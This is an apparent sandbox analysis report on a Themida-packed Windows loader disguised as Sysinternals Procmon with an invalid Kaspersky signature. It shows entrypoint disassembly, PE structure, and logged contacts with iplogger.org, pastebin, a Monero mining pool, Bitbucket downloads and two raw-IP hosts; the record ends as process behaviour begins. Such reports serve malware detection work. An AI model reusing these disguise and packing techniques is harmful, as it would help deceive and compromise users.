                                                                                                                                                                                            Time Stamp:0x603182EC [Sat Feb 20 21:45:16 2021 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:4328f7206db519cd4e82283211d98e83

                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                            Signature Issuer:CN=DigiCert High Assurance Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                            • 6/1/2017 5:00:00 PM 7/8/2020 5:00:00 AM
                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                            • CN=Kaspersky Lab, O=Kaspersky Lab, L=Moscow, C=RU
                                                                                                                                                                                            Version:3
                                                                                                                                                                                            Thumbprint MD5:D47ED7012E116270A767DA88438C3BA6
                                                                                                                                                                                            Thumbprint SHA-1:3C92C9274AB6D3DD520B13029A2490C4A1D98BC0
                                                                                                                                                                                            Thumbprint SHA-256:3606C42F2608526263AC61997AA0A83B364FB23A6882447CA787B5A5790115D8
                                                                                                                                                                                            Serial:0F9D91C6ABA86F4E54CBB9EF57E68346

                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                            Instruction
                                                                                                                                                                                            call 00007FEF10D2B450h
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            mov ebx, esp
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            mov esi, dword ptr [ebx+08h]
                                                                                                                                                                                            mov edi, dword ptr [ebx+10h]
                                                                                                                                                                                            cld
                                                                                                                                                                                            mov dl, 80h
                                                                                                                                                                                            mov al, byte ptr [esi]
                                                                                                                                                                                            inc esi
                                                                                                                                                                                            mov byte ptr [edi], al
                                                                                                                                                                                            inc edi
                                                                                                                                                                                            mov ebx, 00000002h
                                                                                                                                                                                            add dl, dl
                                                                                                                                                                                            jne 00007FEF10D2B307h
                                                                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                                                                            inc esi
                                                                                                                                                                                            adc dl, dl
                                                                                                                                                                                            jnc 00007FEF10D2B2ECh
                                                                                                                                                                                            add dl, dl
                                                                                                                                                                                            jne 00007FEF10D2B307h
                                                                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                                                                            inc esi
                                                                                                                                                                                            adc dl, dl
                                                                                                                                                                                            jnc 00007FEF10D2B353h
                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                            add dl, dl
                                                                                                                                                                                            jne 00007FEF10D2B307h
                                                                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                                                                            inc esi
                                                                                                                                                                                            adc dl, dl
                                                                                                                                                                                            jnc 00007FEF10D2B3E7h
                                                                                                                                                                                            add dl, dl
                                                                                                                                                                                            jne 00007FEF10D2B307h
                                                                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                                                                            inc esi
                                                                                                                                                                                            adc dl, dl
                                                                                                                                                                                            adc eax, eax
                                                                                                                                                                                            add dl, dl
                                                                                                                                                                                            jne 00007FEF10D2B307h
                                                                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                                                                            inc esi
                                                                                                                                                                                            adc dl, dl
                                                                                                                                                                                            adc eax, eax
                                                                                                                                                                                            add dl, dl
                                                                                                                                                                                            jne 00007FEF10D2B307h
                                                                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                                                                            inc esi
                                                                                                                                                                                            adc dl, dl
                                                                                                                                                                                            adc eax, eax
                                                                                                                                                                                            add dl, dl
                                                                                                                                                                                            jne 00007FEF10D2B307h
                                                                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                                                                            inc esi
                                                                                                                                                                                            adc dl, dl
                                                                                                                                                                                            adc eax, eax
                                                                                                                                                                                            je 00007FEF10D2B30Ah
                                                                                                                                                                                            push edi
                                                                                                                                                                                            mov eax, eax
                                                                                                                                                                                            sub edi, eax
                                                                                                                                                                                            mov al, byte ptr [edi]
                                                                                                                                                                                            pop edi
                                                                                                                                                                                            mov byte ptr [edi], al
                                                                                                                                                                                            inc edi
                                                                                                                                                                                            mov ebx, 00000002h
                                                                                                                                                                                            jmp 00007FEF10D2B29Bh
                                                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                                                            add dl, dl
                                                                                                                                                                                            jne 00007FEF10D2B307h
                                                                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                                                                            inc esi
                                                                                                                                                                                            adc dl, dl
                                                                                                                                                                                            adc eax, eax
                                                                                                                                                                                            add dl, dl
                                                                                                                                                                                            jne 00007FEF10D2B307h
                                                                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                                                                            inc esi
                                                                                                                                                                                            adc dl, dl
                                                                                                                                                                                            jc 00007FEF10D2B2ECh
                                                                                                                                                                                            sub eax, ebx
                                                                                                                                                                                            mov ebx, 00000001h
                                                                                                                                                                                            jne 00007FEF10D2B32Ah
                                                                                                                                                                                            mov ecx, 00000001h
                                                                                                                                                                                            add dl, dl
                                                                                                                                                                                            jne 00007FEF10D2B307h
                                                                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                                                                            inc esi
                                                                                                                                                                                            adc dl, dl
                                                                                                                                                                                            adc ecx, ecx
                                                                                                                                                                                            add dl, dl
                                                                                                                                                                                            jne 00007FEF10D2B307h
                                                                                                                                                                                            mov dl, byte ptr [esi]
                                                                                                                                                                                            inc esi
                                                                                                                                                                                            adc dl, dl
                                                                                                                                                                                            jc 00007FEF10D2B2ECh
                                                                                                                                                                                            push esi
                                                                                                                                                                                            mov esi, edi
                                                                                                                                                                                            sub esi, ebp

                                                                                                                                                                                            Data Directories

                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x803a0x50.idata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x5e8.rsrc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x2836000x36e0.themida
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                            Sections

                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                            0x20000x20000xa00False0.952734375data7.60533357948IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            0x40000x5e80x400False0.9833984375data7.31959916585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            0x60000xc0x200False0.591796875data4.28205134805IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .idata0x80000x20000x200False0.16796875data1.05072803613IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .rsrc0xa0000x20000x600False0.466145833333data4.30121514374IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .themida0xc0000x44c0000x0unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .boot0x4580000x281a000x281a00unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                            Resources

                                                                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                                                                            RT_VERSION0xa0900x358data
                                                                                                                                                                                            RT_MANIFEST0xa3f80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminatorsEnglishUnited States

                                                                                                                                                                                            Imports

                                                                                                                                                                                            DLLImport
                                                                                                                                                                                            kernel32.dllGetModuleHandleA
                                                                                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                                                                                            Version Infos

                                                                                                                                                                                            DescriptionData
                                                                                                                                                                                            Translation0x0000 0x04b0
                                                                                                                                                                                            LegalCopyrightCopyright (c) iZSEcDETBb76bVZ 2020
                                                                                                                                                                                            Assembly Version9.7.3.8
                                                                                                                                                                                            InternalNameLoader.exe
                                                                                                                                                                                            FileVersion1.1.8.9
                                                                                                                                                                                            CompanyNameParagon
                                                                                                                                                                                            Commentskn6p3raejiB_BMU
                                                                                                                                                                                            ProductNameSysinternals Procmon
                                                                                                                                                                                            ProductVersion1.1.8.9
                                                                                                                                                                                            FileDescription8_Xn2YM92vaLR6z
                                                                                                                                                                                            OriginalFilenameLoader.exe

                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Feb 23, 2021 09:11:04.448241949 CET49720443192.168.2.588.99.66.31
                                                                                                                                                                                            Feb 23, 2021 09:11:04.516608000 CET4434972088.99.66.31192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:04.517222881 CET49720443192.168.2.588.99.66.31
                                                                                                                                                                                            Feb 23, 2021 09:11:04.578022003 CET49720443192.168.2.588.99.66.31
                                                                                                                                                                                            Feb 23, 2021 09:11:04.646243095 CET4434972088.99.66.31192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:04.649231911 CET4434972088.99.66.31192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:04.649260998 CET4434972088.99.66.31192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:04.649277925 CET4434972088.99.66.31192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:04.649293900 CET4434972088.99.66.31192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:04.649331093 CET49720443192.168.2.588.99.66.31
                                                                                                                                                                                            Feb 23, 2021 09:11:04.649363041 CET49720443192.168.2.588.99.66.31
                                                                                                                                                                                            Feb 23, 2021 09:11:04.691793919 CET49720443192.168.2.588.99.66.31
                                                                                                                                                                                            Feb 23, 2021 09:11:04.760772943 CET4434972088.99.66.31192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:04.953178883 CET49720443192.168.2.588.99.66.31
                                                                                                                                                                                            Feb 23, 2021 09:11:05.033308029 CET4434972088.99.66.31192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.102938890 CET49721443192.168.2.5104.23.99.190
                                                                                                                                                                                            Feb 23, 2021 09:11:05.143801928 CET44349721104.23.99.190192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.143946886 CET49721443192.168.2.5104.23.99.190
                                                                                                                                                                                            Feb 23, 2021 09:11:05.144543886 CET49721443192.168.2.5104.23.99.190
                                                                                                                                                                                            Feb 23, 2021 09:11:05.186820030 CET44349721104.23.99.190192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.192187071 CET44349721104.23.99.190192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.192218065 CET44349721104.23.99.190192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.192333937 CET49721443192.168.2.5104.23.99.190
                                                                                                                                                                                            Feb 23, 2021 09:11:05.205802917 CET49721443192.168.2.5104.23.99.190
                                                                                                                                                                                            Feb 23, 2021 09:11:05.246607065 CET44349721104.23.99.190192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.246906042 CET44349721104.23.99.190192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.262646914 CET49721443192.168.2.5104.23.99.190
                                                                                                                                                                                            Feb 23, 2021 09:11:05.271116018 CET49720443192.168.2.588.99.66.31
                                                                                                                                                                                            Feb 23, 2021 09:11:05.303430080 CET44349721104.23.99.190192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.310029984 CET44349721104.23.99.190192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.310071945 CET44349721104.23.99.190192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.310129881 CET49721443192.168.2.5104.23.99.190
                                                                                                                                                                                            Feb 23, 2021 09:11:05.382822990 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:05.430214882 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.430372000 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:05.430946112 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:05.478451967 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.482073069 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.482105017 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.482213974 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:05.490542889 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:05.537879944 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.538042068 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.552932024 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:05.600274086 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.964432955 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.964468956 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.964488029 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.964509964 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.964530945 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.964554071 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.964560986 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:05.964575052 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.964596033 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.964626074 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:05.964705944 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:05.965473890 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.965512037 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.965620995 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:05.966531038 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.966562986 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:05.966624975 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:05.967648029 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.109869957 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.109901905 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.110013008 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:06.110044956 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.110066891 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.110097885 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:06.121216059 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.121238947 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.121272087 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:06.121490955 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.121514082 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.121546984 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:06.131071091 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.131103039 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.131206989 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.131217003 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:06.131230116 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.131267071 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:06.141947031 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.141982079 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.142075062 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:06.142169952 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.142188072 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.142218113 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:06.142776012 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.142848969 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:06.153060913 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.153086901 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.153209925 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:06.153263092 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.153281927 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.153333902 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:06.153810978 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.163953066 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.163979053 CET44349723104.21.67.51192.168.2.5
                                                                                                                                                                                            Feb 23, 2021 09:11:06.164110899 CET49723443192.168.2.5104.21.67.51
                                                                                                                                                                                            Feb 23, 2021 09:11:06.164144039 CET44349723104.21.67.51192.168.2.5

                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                            Feb 23, 2021 09:11:04.331671000 CET192.168.2.58.8.8.80x22e1Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:05.043780088 CET192.168.2.58.8.8.80x9e21Standard query (0)pastebin.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:05.320332050 CET192.168.2.58.8.8.80xd4b7Standard query (0)blog.agencia10x.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:38.232750893 CET192.168.2.58.8.8.80xbd56Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:41.171906948 CET192.168.2.58.8.8.80xb30aStandard query (0)pool.minexmr.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:14.398189068 CET192.168.2.58.8.8.80xd753Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:14.476867914 CET192.168.2.58.8.8.80x2a0fStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:16.614902973 CET192.168.2.58.8.8.80x5693Standard query (0)whois.iana.orgA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:17.019965887 CET192.168.2.58.8.8.80x9399Standard query (0)WHOIS.RIPE.NETA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:27.258008957 CET192.168.2.58.8.8.80xfc43Standard query (0)blog.agencia10x.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:31.377082109 CET192.168.2.58.8.8.80xf01Standard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:32.110729933 CET192.168.2.58.8.8.80x90a0Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:32.182064056 CET192.168.2.58.8.8.80xcd15Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:44.136328936 CET192.168.2.58.8.8.80xf82aStandard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:13:07.046222925 CET192.168.2.58.8.8.80x937eStandard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:13:09.545461893 CET192.168.2.58.8.8.80x92b0Standard query (0)iplogger.orgA (IP address)IN (0x0001)

                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                            Feb 23, 2021 09:11:04.390167952 CET8.8.8.8192.168.2.50x22e1No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:05.101070881 CET8.8.8.8192.168.2.50x9e21No error (0)pastebin.com104.23.99.190A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:05.101070881 CET8.8.8.8192.168.2.50x9e21No error (0)pastebin.com104.23.98.190A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:05.381213903 CET8.8.8.8192.168.2.50xd4b7No error (0)blog.agencia10x.com104.21.67.51A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:05.381213903 CET8.8.8.8192.168.2.50xd4b7No error (0)blog.agencia10x.com172.67.213.210A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:38.289825916 CET8.8.8.8192.168.2.50xbd56No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:41.228872061 CET8.8.8.8192.168.2.50xb30aNo error (0)pool.minexmr.com51.68.21.186A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:41.228872061 CET8.8.8.8192.168.2.50xb30aNo error (0)pool.minexmr.com88.99.193.240A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:41.228872061 CET8.8.8.8192.168.2.50xb30aNo error (0)pool.minexmr.com51.68.21.188A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:41.228872061 CET8.8.8.8192.168.2.50xb30aNo error (0)pool.minexmr.com94.130.165.85A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:41.228872061 CET8.8.8.8192.168.2.50xb30aNo error (0)pool.minexmr.com94.130.165.87A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:41.228872061 CET8.8.8.8192.168.2.50xb30aNo error (0)pool.minexmr.com178.32.120.127A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:41.228872061 CET8.8.8.8192.168.2.50xb30aNo error (0)pool.minexmr.com51.254.84.37A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:11:41.228872061 CET8.8.8.8192.168.2.50xb30aNo error (0)pool.minexmr.com94.130.164.163A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:14.447170973 CET8.8.8.8192.168.2.50xd753No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:14.528436899 CET8.8.8.8192.168.2.50x2a0fNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:16.672480106 CET8.8.8.8192.168.2.50x5693No error (0)whois.iana.orgianawhois.vip.icann.orgCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:16.672480106 CET8.8.8.8192.168.2.50x5693No error (0)ianawhois.vip.icann.org192.0.47.59A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:17.069293976 CET8.8.8.8192.168.2.50x9399No error (0)WHOIS.RIPE.NET193.0.6.135A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:27.320939064 CET8.8.8.8192.168.2.50xfc43No error (0)blog.agencia10x.com172.67.213.210A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:27.320939064 CET8.8.8.8192.168.2.50xfc43No error (0)blog.agencia10x.com104.21.67.51A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:31.436317921 CET8.8.8.8192.168.2.50xf01No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:32.171631098 CET8.8.8.8192.168.2.50x90a0No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:32.171631098 CET8.8.8.8192.168.2.50x90a0No error (0)s3-1-w.amazonaws.com52.217.107.52A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:32.242243052 CET8.8.8.8192.168.2.50xcd15No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:32.242243052 CET8.8.8.8192.168.2.50xcd15No error (0)s3-1-w.amazonaws.com52.216.184.195A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:12:44.196438074 CET8.8.8.8192.168.2.50xf82aNo error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:13:07.097923994 CET8.8.8.8192.168.2.50x937eNo error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                                            Feb 23, 2021 09:13:09.605226040 CET8.8.8.8192.168.2.50x92b0No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)

                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                            • 195.2.84.91
                                                                                                                                                                                            • 87.251.71.75:3214

                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                            Statistics

                                                                                                                                                                                            Behavior

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            System Behavior

                                                                                                                                                                                            Analysis Process: 8TD8GfTtaW.exe PID: 6708 Parent PID: 5776

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:09:11:00
                                                                                                                                                                                            Start date:23/02/2021
                                                                                                                                                                                            Path:C:\Users\user\Desktop\8TD8GfTtaW.exe
                                                                                                                                                                                            Wow64 process (32bit):true
